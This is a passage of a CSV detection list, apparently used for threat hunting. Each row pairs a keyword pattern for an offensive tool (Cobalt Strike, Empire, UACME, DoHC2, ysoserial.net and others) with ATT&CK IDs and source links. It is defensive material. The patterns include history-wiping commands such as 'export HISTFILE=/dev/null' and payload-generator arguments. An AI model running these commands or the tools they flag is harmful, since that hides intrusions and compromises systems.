+"*exploit-suggester*","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3712","1016","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z"
+"*ExploitTest.cpp*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z"
+"*ExploitTest.vcxproj*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z"
+"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*export HISTFILESIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*export HISTSIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense 
Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*export KRB5CCNAME=*.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z"
+"*export KRB5CCNAME=/*/impacket/administrator.ccache* ","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Export-PowerViewCSV*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*exports --dll *.dll --prototypes ./Assets/prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
+"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*exrienz/DirtyCow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z"
+"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*external_c2.cna*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.dll*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.Net*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*ExternalC2.Net.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*ExternalC2\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*externalc2_start*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Core*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2-master*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Tests*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Web*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*external-nse-script-library*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*ExternalRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A 
system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractDataXML_BruteForce*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
+"*extracttgsrepfrompcap.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*extra-scripts*timecrack.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*eyewitness -f urls.txt --web*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f payloads_examples/calc.*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*f1zm0/acheron*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*f1zm0/hades*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F3C62326-E221-4481-AC57-EF7F76AAF27B*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*F5BIG-Scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" +"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*FA0DAF13-5058-4382-AE07-65E44AFB5592*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by 